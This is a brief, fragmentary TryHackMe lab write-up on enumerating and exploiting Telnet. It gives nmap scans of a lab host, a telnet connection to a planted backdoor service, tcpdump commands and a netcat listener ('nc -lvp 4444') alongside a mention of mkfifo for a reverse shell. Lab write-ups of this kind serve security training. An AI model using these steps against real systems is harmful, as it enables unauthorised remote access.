Network Services (Telnet) — Tryhackme

Enumerating Telnet

#nmap -Pn -p- 10.10.37.92
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 09:10 EST
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
8012/tcp open unknown
  1. How many ports are open on the target machine?
1
8012
TCP
sudo nmap -Pn 10.10.37.92    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 09:10 EST
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
All 1000 scanned ports on 10.10.37.92 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds
0
sudo telnet 10.10.37.92 8012                
[sudo] password for kali:
Trying 10.10.37.92...
Connected to 10.10.37.92.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
a backdoor
skidy

Exploiting Telnet

SKIDY'S BACKDOOR.
N
  • sudo tcpdump ip proto \\icmp -i tun0
  • sudo tcpdump ip proto \\icmp -i eth0
TCP DUMP
Y
mkfifo
nc -lvp 4444

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store